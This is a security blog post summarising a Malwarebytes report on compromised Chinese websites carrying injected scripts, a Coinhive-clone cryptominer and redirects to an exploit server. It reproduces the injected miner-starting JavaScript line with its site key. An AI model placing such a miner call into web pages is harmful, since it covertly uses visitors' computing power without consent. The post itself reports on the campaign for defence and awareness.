“For years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code. Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China,” said Malwarebytes.
This campaign was detected because Malwarebytes researchers observe an abnormal situation, namely external content embedded in iframes via scripts.
For instance, we find a reference to a Coinhive clone:
var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', { threads: navigator.hardwareConcurrency, autoThreads: false, throttle: 0.2, forceASMJS: false }); miner.start();
Malwarebytes wrote:
We are unsure whether this is a pure ripoff (the website template is almost identical), but one is different from the other in that the Chinese version (hosted at ppoi[.]org) only takes a 10 percent commission as opposed to 30 percent for Coinhive.
也就是说,您将获得挖矿收益的90%,与矿池不同,这个收益是固定的,不论是否爆块您都将获得该笔收益 我们希望保留10%来补偿不爆块的损失,维持服务器的运行等 I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this rate is fixed, regardless of actual blocks found and the luck involved finding them. We keep 10% for us to operate this service and to (hopefully) turn a profit
Finally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:
Official report here. Enjoy!
Pedro Tavares is a professional in the field of information security working as an Ethical Hacker/Pentester, Malware Researcher and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog seguranca-informatica.pt.
In recent years he has invested in the field of information security, exploring and analyzing a wide range of topics, such as pentesting (Kali Linux), malware, exploitation, hacking, IoT and security in Active Directory networks. He is also Freelance Writer (Infosec. Resources Institute and Cyber Defense Magazine) and developer of the 0xSI_f33d – a feed that compiles phishing and malware campaigns targeting Portuguese citizens.
Read more here.